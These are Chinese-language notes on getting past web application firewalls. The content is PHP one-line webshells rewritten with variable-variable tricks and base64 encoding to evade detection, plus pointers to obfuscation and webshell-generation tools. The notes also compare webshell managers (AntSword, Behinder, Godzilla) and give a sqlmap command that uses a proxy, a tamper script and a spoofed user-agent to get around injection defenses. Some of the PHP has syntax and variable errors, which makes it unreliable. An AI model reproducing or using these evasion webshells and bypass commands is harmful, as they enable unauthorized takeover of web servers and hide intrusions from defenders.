waf绕过总结之权限控制代码混淆及行为造轮子
1.导图
权限控制
脚本:
asp,php,jsp,aspx,py,war等
工具:
菜刀,蚁剑,冰蝎
代码:
加密混淆
变量覆盖+参数传递
异或生成
行为:
指纹变异
自写轮子
监测:
常规安全脚本工具使用
2.木马(一句话)代码绕过:
会被识别:
<?php assert($_post['chopper']; ?>
更改为:
<?php
$a=$_GET['x']; #变量a=b
$$b=$_GET['y']; #传入assert
$b($_POST['z']; #组合成马
?>
使用:?x=b&y=assert + post: z=phpinfo();
访问时发现宝塔拦截了phpinfo(),更改为:
<?php
$a=$_GET['x'];
$$b=$_GET['y'];
$b=(base64_decode($_POST['z']); #通过编码来绕过监测,将z=phpinfo();用base64编码后再提交。
?>
3.一句话木马加密混淆
网上下载加密项目:enphp-master
接口加密:https://www.phpjiami.com/phpjiami.html
补充:为什么加密后计算机可以识别:
因为混淆加密后里面自己写函数然后还原。还有一种拓展加密,也就是要利用PHP拓展程序,但是免拓展的可以直接运行,因为里面自解析了。
生产各种语言免杀的项目:GitHub上的webshell-venom-master
介绍:采用魔术方法,随机命名,加密,反序列化
4.工具特点
蚁剑:更新状态,有插件,拓展性强,单向加密传输
冰蝎:更新状态,未知插件,双向加密
哥斯拉:新出
waf绕过-漏洞利用之注入上传站点等绕过
1.漏洞利用:
sql注入
文件上传
xss跨站
文件包含
rce执行
2.sql注入绕过
用代理过cc防护,用自定义规则绕过注入代码的防护,用自定义user-agent头绕过检测防护
sqlmap -u 'https://' --proxy="代理" --tamper=rdog.py --user-agent="mozilla15.0....."
解释:--tamper=rdog.py 注入语句payload的替换绕过
--random-agent 会随机产生user-agent头